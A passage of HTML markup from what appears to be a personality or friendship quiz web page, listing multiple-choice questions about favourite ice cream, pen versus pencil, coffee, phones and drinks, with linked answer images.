<div class="fivepxtop" style="font-size: 18px">Cycling</div>
</td>
</tr>
</table>
</div>
<div id="enzzb" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What is your Favourite Ice-Cream?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q2/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Chocolate</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q2/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Vanilla</div>
</td>
</tr>
<tr>
<td value='f' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q2/f.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Mango</div>
</td>
<td value='d' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q2/d.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Strawberry</div>
</td>
</tr>
<tr>
<td value='e' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q2/e.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Coffee</div>
</td>
<td value='c' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q2/c.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Butterscotch</div>
</td>
</tr>
</table>
</div>
<div id="ens" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What’s your pick: pen or pencil?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/s/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Pen</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/s/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Pencil</div>
</td>
</tr>
</table>
</div>
<div id="env" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What would you drink?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/v/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Cold Coffee</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/v/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Hot Coffee</div>
</td>
</tr>
</table>
</div>
<div id="enu" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">Do you like an Android phone or iPhone?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/u/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Android Phone</div>
</td>
<td value='b' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../dare2019/question_images/en/u/b.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Apple iPhone</div>
</td>
</tr>
</table>
</div>
<div id="enzze" class="question hidden unanswered" language="en">
<h3 class="fivepxbotton tenpxtop center question_text">What is your favorite drink?</h3>
<table class="pure-table pure-table-horizontal table_spacing">
<tr>
<td value='a' class="set_answer center">
<img data-src="https://grandedesafio.com/images/grandedesafio/question_images/../../bffmeter/question_images/q5/a.jpg?v=5" alt="">
<br>
<div class="fivepxtop" style="font-size: 18px">Tea</div>